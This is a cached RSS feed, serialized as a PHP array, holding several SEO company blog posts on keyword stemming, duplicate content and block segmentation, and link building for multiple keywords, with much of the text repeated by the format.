aligncenter\"><a href=\"http://seodesignsolutions.com/blog/articles/topical-relevance-seo-and-keyword-stemming/\"><img class=\"size-full wp-image-2549\" title=\"keyword-stemming\" src=\"http://seodesignsolutions.com/blog/wp-content/uploads/2009/05/keyword-stemming.jpg\" alt=\"Create Topical Relevance for Keyword Stemming\" width=\"425\" height=\"282\" srcset=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2009/05/keyword-stemming.jpg 425w, http://www.seodesignsolutions.com/blog/wp-content/uploads/2009/05/keyword-stemming-300x199.jpg 300w\" sizes=\"(max-width: 425px) 100vw, 425px\" /></a><p class=\"wp-caption-text\">Create Topical Relevance for Keyword Stemming</p></div>\n<p>What degree of contextual extraction from search engine snippets contributes to ambient or unintentional search engine rankings? Considering that <strong>over 50% of keyword queries are unique</strong> and even search engines have not seen them; information retrieval relies on <a href=\"http://seodesignsolutions.com/blog/how-to-reference-material/using-lsi-based-synonyms-for-on-page-semantic-relevance/\">contextual relevance</a> to determine a pages quality score determined by the domain authority.<span id=\"more-2553\"></span></p>\n<p><a class=\'wl-entity-page-link\' href=\'http://www.seodesignsolutions.com/blog/entity/web-search-engine/\'>Search engine</a> optimization (<a class=\'wl-entity-page-link\' href=\'http://www.seodesignsolutions.com/blog/entity/search-engine-optimization-2/\'>SEO</a>) involves fine tuning your pages for optimal performance in search engines.  While many webmasters and <a class=\'wl-entity-page-link\' href=\'http://www.seodesignsolutions.com/blog/entity/search-engine-optimization-2/\'>SEO</a>&#8216;s only focus on <strong>metrics you can measure</strong>, there is a holistic and alchemical element that occurs naturally over time when the value of each page blends and fuses to create topical islands of relevance. This topical relevance allows pages to rank for a plethora of key phrases unintentionally and deliver an array of traffic to fuel conversion for your website.</p>\n<p>There is a <strong>window of relevance</strong> that search engines use to determine which content stays and which content goes. For example, pages from sites that have not been visited since 1997 without inbound links, references or any type of inference from peers (other sites) lack the necessary impact to remain a relevant result and are either minimized to <a class=\'wl-entity-page-link\' href=\'http://www.seodesignsolutions.com/blog/entity/ranking/\'>ranking</a> for 1-2 terms or are essentially pushed out of the index.</p>\n<p>On the contrary a new page from a trusted site or a new page from a site being linked to from other topical sites, social media sites, news aggregators, directories or editorially from various sources does have the needed ingredients to toggle the metrics necessary to be considered a relevant page and thus ensures its survival in the SERPs.</p>\n<p>Essentially, each page that crosses a <strong>relevance threshold</strong> for the on page and off page synergy starts to stem and rank for keywords found sparsely on that page. This translates into hit after hit for keyword that was not considered primary phrases for the page in question.</p>\n<p>This is typically referred to as <em>mid-tail to long-tail traffic</em>, however, this type of traffic can often exceed intentional (sought after) primary keywords consistently. In addition, using this aspect of how search engines scale relevance (before awarding a site a top <a class=\'wl-entity-page-link\' href=\'http://www.seodesignsolutions.com/blog/entity/ranking/\'>ranking</a>) <a href=\"http://seodesignsolutions.com/blog/link-building/website-optimization-tips-for-link-building-and-seo/\">keyword stemming</a> should be utilized as a strategic advantage.</p>\n<p>Mapping out the most <a href=\"http://seodesignsolutions.com/blog/seo/seo-optimized/\">relevant shingles</a> to define your page to search engines, then using accommodating anchor text (on page) within the site with internal links and reinforcing that with (off page) links from other sites with related topical reference (<a class=\'wl-entity-page-link\' href=\'http://www.seodesignsolutions.com/blog/entity/peer-review/\'>peer review</a>) creates authority for those keywords and key phrases.</p>\n<p>So, for those still trying to measure the <a href=\"http://seodesignsolutions.com/blog/seo-services/seo-pricing-why-seo-rates-cost-so-much/\"><a class=\'wl-entity-page-link\' href=\'http://www.seodesignsolutions.com/blog/entity/return-on-investment/\'>ROI</a> of <a class=\'wl-entity-page-link\' href=\'http://www.seodesignsolutions.com/blog/entity/search-engine-optimization-2/\'>SEO</a></a> prematurely, the results are cumulative and essentially continue to overlap over time. The takeaway is, with the exceedingly high degree of click fraud occurring in <a href=\"http://seodesignsolutions.com/blog/internet-marketing/seo-ppc-advertising-branding-or-lead-generation/\"><a class=\'wl-entity-page-link\' href=\'http://www.seodesignsolutions.com/blog/entity/pay-per-click/\'>PPC</a> </a>(up to 35% in some instances) taking control of how you communicate your pages purpose to search engines and how they evaluate your website (as a reference or authority) is an added benefit of <a class=\'wl-entity-page-link\' href=\'http://www.seodesignsolutions.com/blog/entity/search-engine-optimization-2/\'>SEO</a>.</p>\n<p>For every keyword you target with purpose, 10 more are also pulled into the spotlight (which you can use to stem and pull up multiple related pages within your website into the top 10 results).</p>\n<p>What is <strong>the value of a top 10 <a class=\'wl-entity-page-link\' href=\'http://www.seodesignsolutions.com/blog/entity/ranking/\'>ranking</a></strong> you might ask? That all depends on how trafficked the keyword or the topic are. However, aside from <a class=\'wl-entity-page-link\' href=\'http://www.seodesignsolutions.com/blog/entity/web-traffic/\'>visitors</a> typing in keywords and searching for those pages, search engines can evaluate when your content has passed the contextual point of relevance and will essentially return those pages as relevant results (when someone searches).</p>\n<p>With this in mind, you can target the low hanging fruit of today to capture the most competitive keywords in the long-run and create a pure win/win relevance model for your website.</p>\n<p>Viewing <a class=\'wl-entity-page-link\' href=\'http://www.seodesignsolutions.com/blog/entity/search-engine-optimization-2/\'>SEO</a> from this standpoint, you can reap the immediate short-term benefits of rankings funneling <a class=\'wl-entity-page-link\' href=\'http://www.seodesignsolutions.com/blog/entity/web-traffic/\'>visitors</a> to landing pages or take the approach of devouring market share so that &#8220;just in case&#8221; prospects search for a particular topic; your website is there at the helm of all things related.</p>\n<div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=5s6Rr3nWUss:pCMvl1WIdDA:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/5s6Rr3nWUss\" height=\"1\" width=\"1\" alt=\"\"/>\";}s:11:\"description\";s:487:\"For the purpose of SEO, context is a definitive factor that can (1) elevate your website past others competing for similar or related keywords (2) build topical domain authority and (3) increase conversion by having a higher number of pages occupying a larger percentage of market share for related keywords and queries. Create Topical Relevance <a href=\"http://www.seodesignsolutions.com/blog/articles/topical-relevance-seo-and-keyword-stemming/\" class=\"read-more-excerpt\">Read More</a>\";s:3:\"wfw\";a:1:{s:10:\"commentrss\";s:96:\"http://www.seodesignsolutions.com/blog/articles/topical-relevance-seo-and-keyword-stemming/feed/\";}s:5:\"slash\";a:1:{s:8:\"comments\";s:2:\"28\";}s:10:\"feedburner\";a:1:{s:8:\"origlink\";s:91:\"http://www.seodesignsolutions.com/blog/articles/topical-relevance-seo-and-keyword-stemming/\";}s:7:\"summary\";s:487:\"For the purpose of SEO, context is a definitive factor that can (1) elevate your website past others competing for similar or related keywords (2) build topical domain authority and (3) increase conversion by having a higher number of pages occupying a larger percentage of market share for related keywords and queries. Create Topical Relevance <a href=\"http://www.seodesignsolutions.com/blog/articles/topical-relevance-seo-and-keyword-stemming/\" class=\"read-more-excerpt\">Read More</a>\";s:12:\"atom_content\";s:8050:\"<p>For the purpose of <a href=\"http://www.seodesignsolutions.com/\"><a class=\'wl-entity-page-link\' href=\'http://www.seodesignsolutions.com/blog/entity/search-engine-optimization-2/\'>SEO</a></a>, context is a definitive factor that can (1) elevate your website past others competing for similar or related keywords (2) build topical <a href=\"http://seodesignsolutions.com/blog/seo/develop-domain-authority/\">domain authority</a> and (3) increase conversion by having a higher number of pages occupying a larger percentage of market share for <a href=\"http://seodesignsolutions.com/blog/seo-basics/using-related-search-to-find-googles-most-search-keywords/\">related keywords</a> and queries.</p>\n<div id=\"attachment_2549\" style=\"width: 435px\" class=\"wp-caption aligncenter\"><a href=\"http://seodesignsolutions.com/blog/articles/topical-relevance-seo-and-keyword-stemming/\"><img class=\"size-full wp-image-2549\" title=\"keyword-stemming\" src=\"http://seodesignsolutions.com/blog/wp-content/uploads/2009/05/keyword-stemming.jpg\" alt=\"Create Topical Relevance for Keyword Stemming\" width=\"425\" height=\"282\" srcset=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2009/05/keyword-stemming.jpg 425w, http://www.seodesignsolutions.com/blog/wp-content/uploads/2009/05/keyword-stemming-300x199.jpg 300w\" sizes=\"(max-width: 425px) 100vw, 425px\" /></a><p class=\"wp-caption-text\">Create Topical Relevance for Keyword Stemming</p></div>\n<p>What degree of contextual extraction from search engine snippets contributes to ambient or unintentional search engine rankings? Considering that <strong>over 50% of keyword queries are unique</strong> and even search engines have not seen them; information retrieval relies on <a href=\"http://seodesignsolutions.com/blog/how-to-reference-material/using-lsi-based-synonyms-for-on-page-semantic-relevance/\">contextual relevance</a> to determine a pages quality score determined by the domain authority.<span id=\"more-2553\"></span></p>\n<p><a class=\'wl-entity-page-link\' href=\'http://www.seodesignsolutions.com/blog/entity/web-search-engine/\'>Search engine</a> optimization (<a class=\'wl-entity-page-link\' href=\'http://www.seodesignsolutions.com/blog/entity/search-engine-optimization-2/\'>SEO</a>) involves fine tuning your pages for optimal performance in search engines.  While many webmasters and <a class=\'wl-entity-page-link\' href=\'http://www.seodesignsolutions.com/blog/entity/search-engine-optimization-2/\'>SEO</a>&#8216;s only focus on <strong>metrics you can measure</strong>, there is a holistic and alchemical element that occurs naturally over time when the value of each page blends and fuses to create topical islands of relevance. This topical relevance allows pages to rank for a plethora of key phrases unintentionally and deliver an array of traffic to fuel conversion for your website.</p>\n<p>There is a <strong>window of relevance</strong> that search engines use to determine which content stays and which content goes. For example, pages from sites that have not been visited since 1997 without inbound links, references or any type of inference from peers (other sites) lack the necessary impact to remain a relevant result and are either minimized to <a class=\'wl-entity-page-link\' href=\'http://www.seodesignsolutions.com/blog/entity/ranking/\'>ranking</a> for 1-2 terms or are essentially pushed out of the index.</p>\n<p>On the contrary a new page from a trusted site or a new page from a site being linked to from other topical sites, social media sites, news aggregators, directories or editorially from various sources does have the needed ingredients to toggle the metrics necessary to be considered a relevant page and thus ensures its survival in the SERPs.</p>\n<p>Essentially, each page that crosses a <strong>relevance threshold</strong> for the on page and off page synergy starts to stem and rank for keywords found sparsely on that page. This translates into hit after hit for keyword that was not considered primary phrases for the page in question.</p>\n<p>This is typically referred to as <em>mid-tail to long-tail traffic</em>, however, this type of traffic can often exceed intentional (sought after) primary keywords consistently. In addition, using this aspect of how search engines scale relevance (before awarding a site a top <a class=\'wl-entity-page-link\' href=\'http://www.seodesignsolutions.com/blog/entity/ranking/\'>ranking</a>) <a href=\"http://seodesignsolutions.com/blog/link-building/website-optimization-tips-for-link-building-and-seo/\">keyword stemming</a> should be utilized as a strategic advantage.</p>\n<p>Mapping out the most <a href=\"http://seodesignsolutions.com/blog/seo/seo-optimized/\">relevant shingles</a> to define your page to search engines, then using accommodating anchor text (on page) within the site with internal links and reinforcing that with (off page) links from other sites with related topical reference (<a class=\'wl-entity-page-link\' href=\'http://www.seodesignsolutions.com/blog/entity/peer-review/\'>peer review</a>) creates authority for those keywords and key phrases.</p>\n<p>So, for those still trying to measure the <a href=\"http://seodesignsolutions.com/blog/seo-services/seo-pricing-why-seo-rates-cost-so-much/\"><a class=\'wl-entity-page-link\' href=\'http://www.seodesignsolutions.com/blog/entity/return-on-investment/\'>ROI</a> of <a class=\'wl-entity-page-link\' href=\'http://www.seodesignsolutions.com/blog/entity/search-engine-optimization-2/\'>SEO</a></a> prematurely, the results are cumulative and essentially continue to overlap over time. The takeaway is, with the exceedingly high degree of click fraud occurring in <a href=\"http://seodesignsolutions.com/blog/internet-marketing/seo-ppc-advertising-branding-or-lead-generation/\"><a class=\'wl-entity-page-link\' href=\'http://www.seodesignsolutions.com/blog/entity/pay-per-click/\'>PPC</a> </a>(up to 35% in some instances) taking control of how you communicate your pages purpose to search engines and how they evaluate your website (as a reference or authority) is an added benefit of <a class=\'wl-entity-page-link\' href=\'http://www.seodesignsolutions.com/blog/entity/search-engine-optimization-2/\'>SEO</a>.</p>\n<p>For every keyword you target with purpose, 10 more are also pulled into the spotlight (which you can use to stem and pull up multiple related pages within your website into the top 10 results).</p>\n<p>What is <strong>the value of a top 10 <a class=\'wl-entity-page-link\' href=\'http://www.seodesignsolutions.com/blog/entity/ranking/\'>ranking</a></strong> you might ask? That all depends on how trafficked the keyword or the topic are. However, aside from <a class=\'wl-entity-page-link\' href=\'http://www.seodesignsolutions.com/blog/entity/web-traffic/\'>visitors</a> typing in keywords and searching for those pages, search engines can evaluate when your content has passed the contextual point of relevance and will essentially return those pages as relevant results (when someone searches).</p>\n<p>With this in mind, you can target the low hanging fruit of today to capture the most competitive keywords in the long-run and create a pure win/win relevance model for your website.</p>\n<p>Viewing <a class=\'wl-entity-page-link\' href=\'http://www.seodesignsolutions.com/blog/entity/search-engine-optimization-2/\'>SEO</a> from this standpoint, you can reap the immediate short-term benefits of rankings funneling <a class=\'wl-entity-page-link\' href=\'http://www.seodesignsolutions.com/blog/entity/web-traffic/\'>visitors</a> to landing pages or take the approach of devouring market share so that &#8220;just in case&#8221; prospects search for a particular topic; your website is there at the helm of all things related.</p>\n<div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=5s6Rr3nWUss:pCMvl1WIdDA:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/5s6Rr3nWUss\" height=\"1\" width=\"1\" alt=\"\"/>\";}i:1;a:13:{s:5:\"title\";s:49:\"Block Segmentation, Duplicate Content, SEO and IR\";s:4:\"link\";s:77:\"http://feeds.seodesignsolutions.com/~r/SeoDesignSolutionsBlog/~3/5cAozBpoIes/\";s:8:\"category\";s:156:\"SEO ResourcesAvoid Duplication Across BlocksSearch Engine Context and DuplicationSEOSEO and Block SegmentationSEO and IRSEO Term Frequency and Co occurrence\";s:2:\"dc\";a:1:{s:7:\"creator\";s:13:\"Jeffrey_Smith\";}s:7:\"pubdate\";s:29:\"Sun, 14 May 2017 06:55:18 PDT\";s:4:\"guid\";s:79:\"http://www.seodesignsolutions.com/blog/seo-resources/seo-information-retrieval/\";s:7:\"content\";a:1:{s:7:\"encoded\";s:6111:\"<p>Often you hear about the need to prevent duplicate content within your own website as it applies to <a href=\"http://www.seodesignsolutions.com/\">SEO</a>, but why? This is our take on why creating uniquely distinct nodes on each page is imperative for your content to produce not only context, but rankings as opposed to tripping search engine filters.</p>\n<p><a href=\"http://seodesignsolutions.com/blog/seo-resources/seo-information-retrieval\"><img class=\"aligncenter size-full wp-image-9652\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2009/04/uniqueness.jpg\" alt=\"duplicate content\" width=\"425\" height=\"282\" srcset=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2009/04/uniqueness.jpg 425w, http://www.seodesignsolutions.com/blog/wp-content/uploads/2009/04/uniqueness-300x199.jpg 300w\" sizes=\"(max-width: 425px) 100vw, 425px\" /></a></p>\n<p>Block segment analysis dictates the value of weight / ranking  factors a web page is given for a set portion of the page. For example, text in the header and footer of a document are treated differently than say text in the body section of a page.</p>\n<p>The header is given more weight than the footer and typically the body text is given more value than both (since that is where the page has the ability to distinguish itself from borrowed elements, i.e. navigation, etc.).<span id=\"more-1821\"></span></p>\n<p>The reason for this is simple, page composition dictates that proximity and distinction (the more unique one document is from another) by distinguishing your content, the better. Search engines can easily discern duplication (through shingle analysis, singular value decomposition, etc.) in areas such as navigation, sidebars/blogrolls with the same links and footers all using the same text. This has the tendency of diffuse a pages ranking potential.</p>\n<p>In order to leverage a page for <a href=\"http://www.seodesignsolutions.com\">SEO</a>, it must (1) get indexed and (2) stay indexed in order to pass its ideal <a href=\"http://seodesignsolutions.com/blog/seo/seo-theme-density-2/\">ranking factor</a>, be used to bridge ranking factor as a <a href=\"http://seodesignsolutions.com/blog/articles/hub-pages-for-seo/\">hub</a> by building <a href=\"http://seodesignsolutions.com/blog/seo-web-design/internal-links-are-you-making-the-most-of-yours/\">internal links</a> to and from that page. If search engines determine that your pages are redundant or ubiquitous the dampener kicks in algorithmically and the ranking factor can be suppressed via de-indexing or filters (<strong>like the supplemental index</strong>) as a basis of sequencing leaving the same repetitive hash mark (from document to document).</p>\n<p>This aspect of the ranking algorithm is based on the <a href=\"http://www.miislita.com/semantics/c-index-1.html\">c-index</a> whereby <a href=\"http://www.miislita.com/information-retrieval-tutorial/cosine-similarity-tutorial.html\">term weight</a> and similarity are used to assign relevance through <a href=\"http://mathworld.wolfram.com/SingularValueDecomposition.html\">singular value decomposition</a> as a base vector across web pages. If enough of the singular values are identified across the global collection of documents then you have co-occurrence (which may in this instance work against your ranking objectives).</p>\n<p>Duplication via a template or though tag pages that lack unique content can go supplemental in a secondary search index, if they are not nurtured with enough <a href=\"http://seodesignsolutions.com/blog/link-building/what-is-the-real-value-of-a-link/\">internal link flow</a>. The gist here is, the larger your website grows, the higher the probability of diffusing or diluting your global nodes / top ranking keywords (a.k.a <a href=\"http://seodesignsolutions.com/blog/search-engine-optimization/duplicate-content-and-shingle-analysis-for-seo/\">keyword cannibalization</a>) like an over-optimization penalty.</p>\n<p>Just like a base that shifts to accommodate scalability, the foundation (like a triangle) must continue to broaden its base if the vertical threshold continues to rise. Similarly, the more pages you add about (1) topic A shift the focus from topic B. The common thread in most websites is the navigation (which if left to a simplistic ontology is not sufficient to feed an entire website).</p>\n<p>You can stem a websites topic into multiple topics, however each has a threshold to cross and moving on many fronts requires more inbound links and internal stability though secondary navigation to <a href=\"http://seodesignsolutions.com/blog/seo/using-seo-to-sculpt-relevance-for-keyword-prominence/\">sculpt the on page factors</a> that identify each segments (to pass value).</p>\n<p>This is why <a href=\"http://seodesignsolutions.com/blog/search-engine-optimization-myths/you-cant-buy-credibility/\">virtual theming</a> (linking from relevant keywords in one document to another document) is so important. It allows the ranking factor to transfer link weight to the champion page through term frequency which essentially raises the bar in how search engines will interpret each respective keyword when considering it for retrieval.</p>\n<p>Deep linking (acquiring inbound links to a specific page vs. just the homepage) is equally as beneficial for eliminating the tendency for pages to go supplemental (or lose ranking factor as a unique asset). When you spread a site too thin (expand the content through automation) such as using a shopping cart that pulls similar values from a database. You must ensure that you have the ability to customize data (titles, h1, and content) to make each page distinct enough to add additional leverage to your primary, secondary and tertiary keywords that define your website.</p>\n<div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=5cAozBpoIes:1bPFb7KHJek:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/5cAozBpoIes\" height=\"1\" width=\"1\" alt=\"\"/>\";}s:11:\"description\";s:446:\"Often you hear about the need to prevent duplicate content within your own website as it applies to SEO, but why? This is our take on why creating uniquely distinct nodes on each page is imperative for your content to produce not only context, but rankings as opposed to tripping search engine filters. Block segment <a href=\"http://www.seodesignsolutions.com/blog/seo-resources/seo-information-retrieval/\" class=\"read-more-excerpt\">Read More</a>\";s:3:\"wfw\";a:1:{s:10:\"commentrss\";s:84:\"http://www.seodesignsolutions.com/blog/seo-resources/seo-information-retrieval/feed/\";}s:5:\"slash\";a:1:{s:8:\"comments\";s:2:\"13\";}s:10:\"feedburner\";a:1:{s:8:\"origlink\";s:79:\"http://www.seodesignsolutions.com/blog/seo-resources/seo-information-retrieval/\";}s:7:\"summary\";s:446:\"Often you hear about the need to prevent duplicate content within your own website as it applies to SEO, but why? This is our take on why creating uniquely distinct nodes on each page is imperative for your content to produce not only context, but rankings as opposed to tripping search engine filters. Block segment <a href=\"http://www.seodesignsolutions.com/blog/seo-resources/seo-information-retrieval/\" class=\"read-more-excerpt\">Read More</a>\";s:12:\"atom_content\";s:6111:\"<p>Often you hear about the need to prevent duplicate content within your own website as it applies to <a href=\"http://www.seodesignsolutions.com/\">SEO</a>, but why? This is our take on why creating uniquely distinct nodes on each page is imperative for your content to produce not only context, but rankings as opposed to tripping search engine filters.</p>\n<p><a href=\"http://seodesignsolutions.com/blog/seo-resources/seo-information-retrieval\"><img class=\"aligncenter size-full wp-image-9652\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2009/04/uniqueness.jpg\" alt=\"duplicate content\" width=\"425\" height=\"282\" srcset=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2009/04/uniqueness.jpg 425w, http://www.seodesignsolutions.com/blog/wp-content/uploads/2009/04/uniqueness-300x199.jpg 300w\" sizes=\"(max-width: 425px) 100vw, 425px\" /></a></p>\n<p>Block segment analysis dictates the value of weight / ranking  factors a web page is given for a set portion of the page. For example, text in the header and footer of a document are treated differently than say text in the body section of a page.</p>\n<p>The header is given more weight than the footer and typically the body text is given more value than both (since that is where the page has the ability to distinguish itself from borrowed elements, i.e. navigation, etc.).<span id=\"more-1821\"></span></p>\n<p>The reason for this is simple, page composition dictates that proximity and distinction (the more unique one document is from another) by distinguishing your content, the better. Search engines can easily discern duplication (through shingle analysis, singular value decomposition, etc.) in areas such as navigation, sidebars/blogrolls with the same links and footers all using the same text. This has the tendency of diffuse a pages ranking potential.</p>\n<p>In order to leverage a page for <a href=\"http://www.seodesignsolutions.com\">SEO</a>, it must (1) get indexed and (2) stay indexed in order to pass its ideal <a href=\"http://seodesignsolutions.com/blog/seo/seo-theme-density-2/\">ranking factor</a>, be used to bridge ranking factor as a <a href=\"http://seodesignsolutions.com/blog/articles/hub-pages-for-seo/\">hub</a> by building <a href=\"http://seodesignsolutions.com/blog/seo-web-design/internal-links-are-you-making-the-most-of-yours/\">internal links</a> to and from that page. If search engines determine that your pages are redundant or ubiquitous the dampener kicks in algorithmically and the ranking factor can be suppressed via de-indexing or filters (<strong>like the supplemental index</strong>) as a basis of sequencing leaving the same repetitive hash mark (from document to document).</p>\n<p>This aspect of the ranking algorithm is based on the <a href=\"http://www.miislita.com/semantics/c-index-1.html\">c-index</a> whereby <a href=\"http://www.miislita.com/information-retrieval-tutorial/cosine-similarity-tutorial.html\">term weight</a> and similarity are used to assign relevance through <a href=\"http://mathworld.wolfram.com/SingularValueDecomposition.html\">singular value decomposition</a> as a base vector across web pages. If enough of the singular values are identified across the global collection of documents then you have co-occurrence (which may in this instance work against your ranking objectives).</p>\n<p>Duplication via a template or though tag pages that lack unique content can go supplemental in a secondary search index, if they are not nurtured with enough <a href=\"http://seodesignsolutions.com/blog/link-building/what-is-the-real-value-of-a-link/\">internal link flow</a>. The gist here is, the larger your website grows, the higher the probability of diffusing or diluting your global nodes / top ranking keywords (a.k.a <a href=\"http://seodesignsolutions.com/blog/search-engine-optimization/duplicate-content-and-shingle-analysis-for-seo/\">keyword cannibalization</a>) like an over-optimization penalty.</p>\n<p>Just like a base that shifts to accommodate scalability, the foundation (like a triangle) must continue to broaden its base if the vertical threshold continues to rise. Similarly, the more pages you add about (1) topic A shift the focus from topic B. The common thread in most websites is the navigation (which if left to a simplistic ontology is not sufficient to feed an entire website).</p>\n<p>You can stem a websites topic into multiple topics, however each has a threshold to cross and moving on many fronts requires more inbound links and internal stability though secondary navigation to <a href=\"http://seodesignsolutions.com/blog/seo/using-seo-to-sculpt-relevance-for-keyword-prominence/\">sculpt the on page factors</a> that identify each segments (to pass value).</p>\n<p>This is why <a href=\"http://seodesignsolutions.com/blog/search-engine-optimization-myths/you-cant-buy-credibility/\">virtual theming</a> (linking from relevant keywords in one document to another document) is so important. It allows the ranking factor to transfer link weight to the champion page through term frequency which essentially raises the bar in how search engines will interpret each respective keyword when considering it for retrieval.</p>\n<p>Deep linking (acquiring inbound links to a specific page vs. just the homepage) is equally as beneficial for eliminating the tendency for pages to go supplemental (or lose ranking factor as a unique asset). When you spread a site too thin (expand the content through automation) such as using a shopping cart that pulls similar values from a database. You must ensure that you have the ability to customize data (titles, h1, and content) to make each page distinct enough to add additional leverage to your primary, secondary and tertiary keywords that define your website.</p>\n<div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=5cAozBpoIes:1bPFb7KHJek:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/5cAozBpoIes\" height=\"1\" width=\"1\" alt=\"\"/>\";}i:2;a:13:{s:5:\"title\";s:66:\"How to Build Links and Optimize your Website for Multiple Keywords\";s:4:\"link\";s:77:\"http://feeds.seodesignsolutions.com/~r/SeoDesignSolutionsBlog/~3/fMke79EeF5s/\";s:8:\"category\";s:137:\"Search Engine OptimizationGoogle-Link-Building-Optimization-StrategyGoogle-SEOHow-to-Optimize-Website-for-Multiple-Keywordsseo-techniques\";s:2:\"dc\";a:1:{s:7:\"creator\";s:13:\"Jeffrey_Smith\";}s:7:\"pubdate\";s:29:\"Wed, 03 May 2017 05:00:26 PDT\";s:4:\"guid\";s:133:\"http://www.seodesignsolutions.com/blog/search-engine-optimization/how-to-build-links-and-optimize-your-website-for-multiple-keywords/\";s:7:\"content\";a:1:{s:7:\"encoded\";s:14799:\"<p>In case you were wondering how to systematically achieve saturation for <strong>multiple keywords</strong> for your website in search engines (instead of just a few) using <a href=\"http://www.seodesignsolutions.com/\">SEO</a>, then this is a must read post. This tactic is specifically designed to work in Google using the allinanchor / keyword relevance ratio to back links pointing at your site.<br />\n<a href=\"http://seodesignsolutions.com/blog/search-engine-optimization/how-to-build-links-and-optimize-your-website-for-multiple-keywords/\"><img src=\"http://seodesignsolutions.com/blog/wp-content/uploads/2008/11/multiple-keywords.jpg\" alt=\"\" title=\"Optimizing Multiple Keywords\" width=\"400\" height=\"275\" class=\"aligncenter size-full wp-image-617\" srcset=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2008/11/multiple-keywords.jpg 400w, http://www.seodesignsolutions.com/blog/wp-content/uploads/2008/11/multiple-keywords-300x206.jpg 300w\" sizes=\"(max-width: 400px) 100vw, 400px\" /></a><br />\nThis is the point where the competition gets nervous as a tactic like this could go viral with just one post from a popular Stumbler, Digg or otherwise. I will leave that at your discretion to cast your vote, but this is not the first time where I should have simply shut up, but I thought I would leave you with some good reading material for the weekend.<span id=\"more-93\"></span></p>\n<p>As an <a href=\"http://www.seodesignsolutions.com/seo/\">SEO</a> company involved in this illustrious industry, I feel like we owe those sincere seekers who yearn for legitimate <a href=\"http://www.seodesignsolutions.com\">SEO</a> techniques and only find dozens of sites with shallow posts, vague references and theory. I don&#8217;t mind sharing a few tactics here and there about <a href=\"http://seodesignsolutions.com/blog/how-to-reference-material/optimizing-your-website-for-multiple-keywords/\">keyword optimization</a>, as the tendency to create, test and implement them typically happens faster than I can write them down. </p>\n<p>This post in essence serves as a web-log of a fundamental technique, that we have used time and time again to bolster <a href=\"http://www.seodesignsolutions.com/seo-services.html\">multiple top 10 positions</a> in search engines.  Naturally, we have to hold back something, otherwise we would make the SEO community obsolete, but in any case, these tactics are what we use when targeting an entire industry for long tail search engine domination, they can also be used for more aggressive/competitive terms by <a href=\"http://seodesignsolutions.com/blog/link-building/should-you-build-links-for-competitive-terms-or-the-long-tail-of-search/\">using this tactic</a>. </p>\n<p>But, in the even that you wish to rank in the top 10 for a result that has 1.2 &#8211; 1.8 million results, you can essentially pick them off like flies using just a fragment of this technique. The terms we consider worthy are usually the ones that takes months to acquire. So, don&#8217;t build links to fast from off topic locations, it&#8217;s better to focus on quality vs. quantity, however having a diverse base of IP addresses to use is ideal (such as an article marketing resource box that you can moderate) Hmmmmm. </p>\n<p><strong>The exercise:</strong></p>\n<p>1. First start off by writing down every possible singular keyword that pertains to your industry. From there narrow it down to the top 20-30 terms. </p>\n<p>You could also just use a keyword discovery tool, but in this instance, think like a consumer trying to reach your site. The reason is, many of the search terms used to reach your site are unique and do not fall into realm of showing up on the &#8220;keyword radar&#8221;, so common sense can equal conversion if you pick the right phrase and beat your competition to the punch.</p>\n<p>2. Then after you have a list of 20-30, start combining two word combinations strategically using the premise of how you think someone may type a query into a search engine.</p>\n<p>web page optimization, optimize my website, how do I SEO my site, etc&#8230; come up with your wild card list of key phrases which you can have fun with later, since if you optimize your site for one group of keywords ALL OF THE KEYWORDS in the anchor text get a boost. So even though you may be <a href=\"http://www.seodesignsolutions.com/link-submissions-services.html\">building links</a> using exact match, you still get the benefit of each individual word in Google.</p>\n<p>3. After you have your list of 30 singular, 20 two-word combinations and 10 or so three-word combinations (just seeing if you were paying attention, since I didn&#8217;t say anything about the 3 word combinations) take each of the two and three word combinations, place the phrases &#8220;in quotes&#8221; and enter them in a standard Google search query one at a time. </p>\n<p>Look at the results of the keywords in quotes and this will give you a good indication of the allinanchor and allintitle relevance by using the quotes. Usually if you do this, you can remove the quotes and 90% of the sites remain the same. Without quotes it may be 1-10 of 2,000,000 results, with &#8220;the quotes&#8221; it may show 1-10 of 20,000. It is the term in quotes you want to look at in order to gain a metric on the competitiveness of this key phrase.</p>\n<p>Also, the more words you add, the easier it is to optimize, even if the chronology of the words does not make sense, you are still optimizing your site for any combination of keywords that are contained in the anchor text. In case it&#8217;s a new term, <a href=\"http://seodesignsolutions.com/blog/seo-marketing/how-to-use-article-marketing-for-building-links-traffic-seo-visibility/\">this is anchor text</a>, so use it wisely as it is your number 1 tool for developing links, relevance and rankings (for now at least) in Google.</p>\n<p>Getting back to the exercise, if the term comes back with under 100,000 results then move it into your to do list of links to build as a likely target for your SEO. Granted that this is merely one tactic, feel free to combine it with your own methods. Now, without giving away too many secrets, you will be responsible for finding ways to build links. </p>\n<p>Not just any links, but links that allow you to have control over the anchor text (the text in the link). Use these terms to whittle away at the root phrases building 100 links per keyword combination, then run analytics 